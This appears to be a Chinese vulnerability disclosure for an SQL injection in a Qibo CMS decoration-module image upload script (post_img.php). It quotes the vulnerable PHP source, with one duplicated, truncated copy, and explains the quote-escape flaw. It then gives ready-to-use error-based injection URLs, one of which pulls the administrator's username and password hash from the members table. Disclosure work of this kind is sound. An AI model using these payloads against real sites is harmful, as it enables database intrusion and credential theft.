<ul><li>/zhuangxiu/inc/job/post_img.php</li></ul><pre class="">foreach( $_FILES AS $key=>$value ){ $i=(int)substr($key,10); if(is_array($value)){ $postfile=$value['tmp_name']; $array[name]=$value['name']; $array[size]=$value['size']; } else{ $postfile=$$key; $array[name]=${$key.'_name'}; $array[size]=${$key.'_size'}; } if($ftype[$i]=='in'&&$array[name]){ if(!eregi("(gif|jpg|png)$",$array[name])){ showerr("只能上传GIF,JPG,PNG格式的文件,你不能上传此文件:$array[name]"); } $array[path]=$webdb[updir]."/fenlei/$fid"; $array[updateTable]=1;//统计用户上传的文件占用空间大小 $filename=upfile($postfile,$array); $photodb[$i]="fenlei/$fid/$filename"; $smallimg=$photodb[$i].'.gif'; $Newpicpath=ROOT_PATH."$webdb[updir]/$smallimg"; gdpic(ROOT_PATH."$webdb[updir]/{$photodb[$i]}",$Newpicpath,300,220,array('fix'=>1)); if(!$rsdb[picurl]){ $rsdb[picurl]=$smallimg; if(!file_exists(ROOT_PATH."$webdb[updir]/$rsdb[picurl]")){ $rsdb[picurl]=$photodb[$i]; } $db->query("UPDATE `{$_pre}content$_erp` SET...
<ul><li>/zhuangxiu/inc/job/post_img.php</li></ul><pre class="">foreach( $_FILES AS $key=>$value ){ $i=(int)substr($key,10); if(is_array($value)){ $postfile=$value['tmp_name']; $array[name]=$value['name']; $array[size]=$value['size']; } else{ $postfile=$$key; $array[name]=${$key.'_name'}; $array[size]=${$key.'_size'}; } if($ftype[$i]=='in'&&$array[name]){ if(!eregi("(gif|jpg|png)$",$array[name])){ showerr("只能上传GIF,JPG,PNG格式的文件,你不能上传此文件:$array[name]"); } $array[path]=$webdb[updir]."/fenlei/$fid"; $array[updateTable]=1;//统计用户上传的文件占用空间大小 $filename=upfile($postfile,$array); $photodb[$i]="fenlei/$fid/$filename"; $smallimg=$photodb[$i].'.gif'; $Newpicpath=ROOT_PATH."$webdb[updir]/$smallimg"; gdpic(ROOT_PATH."$webdb[updir]/{$photodb[$i]}",$Newpicpath,300,220,array('fix'=>1)); if(!$rsdb[picurl]){ $rsdb[picurl]=$smallimg; if(!file_exists(ROOT_PATH."$webdb[updir]/$rsdb[picurl]")){ $rsdb[picurl]=$photodb[$i]; } $db->query("UPDATE `{$_pre}content$_erp` SET picurl='$rsdb[picurl]' WHERE id='$id'"); } /*加水印*/ if( $webdb[is_waterimg] && $webdb[if_gdimg] ) { include_once(ROOT_PATH."inc/waterimage.php"); $uploadfile=ROOT_PATH."$webdb[updir]/$photodb[$i]"; imageWaterMark($uploadfile,$webdb[waterpos],ROOT_PATH.$webdb[waterimg]); } } } foreach( $photodb AS $key=>$value){ if(strlen($value)>4&&!eregi("(gif|jpg|png)$",$value)){ showerr("只能上传GIF,JPG,PNG格式的文件,你不能上传此文件:$value"); } } $num=0; foreach( $photodb AS $key=>$value ){ $titledb[$key]=filtrate($titledb[$key]); $value=trim($value); $value=filtrate($value); if($titledb[$key]>100){ showerr("标题不能大于50个汉字"); } if(strlen($value)<4){ $db->query("DELETE FROM `{$_pre}pic` WHERE pid='{$piddb[$key]}' AND id='$id'"); }elseif($piddb[$key]){ $num++; $db->query("UPDATE `{$_pre}pic` SET name='{$titledb[$key]}',imgurl='$value' WHERE pid='{$piddb[$key]}'"); }elseif($value){ $num++; $db->query("INSERT INTO `{$_pre}pic` ( `id` , `fid` , `mid` , `uid` , `type` , `imgurl` , `name` ) VALUES ( '$id', '$fid', '$mid', '$lfjuid', '0', '$value', '{$titledb[$key]}')"); } } </pre><p>由于$imgurl未作初始化,结合全局机制,可以控制。并且当传入$tabledb为字符时,将会取$tabledb[0],所以传入单引号会截断到“\”造成单引号逃逸。</p><p>当传入:</p><pre class="">http://192.168.199.224/qibo5/zhuangxiu/job.php?photodb%5B%5D=and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a)%23.jpg&piddb%5B%5D=xxx&job=post_img&titledb=%27&act=edit&_erp=xxx&id=1</pre><p>执行的SQL语句为:</p><pre class="">UPDATE `qb_zhuangxiu_pic` SET name='\',imgurl='and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a)#.jpg' WHERE pid='xxx'</pre><p>页面返回: </p><p><img alt="7E050E68-5FB9-4490-A6DB-A9ECE2BC4597.png" src="https://images.seebug.org/@/uploads/1434593687080-7E050E68-5FB9-4490-A6DB-A9ECE2BC4597.png" data-image-size="980,318"><br></p><p>证明漏洞存在。</p><p>访问地址:</p><pre class="">http://192.168.199.224/qibo5/zhuangxiu/job.php?photodb%5B%5D=and (select 1 from (select count(*),concat((select concat(username,0x3a3a,password) from qb_members limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23.jpg&piddb%5B%5D=xxx&job=post_img&titledb=%27&act=edit&_erp=xxx&id=1</pre><p>得到管理员帐号密码 </p>
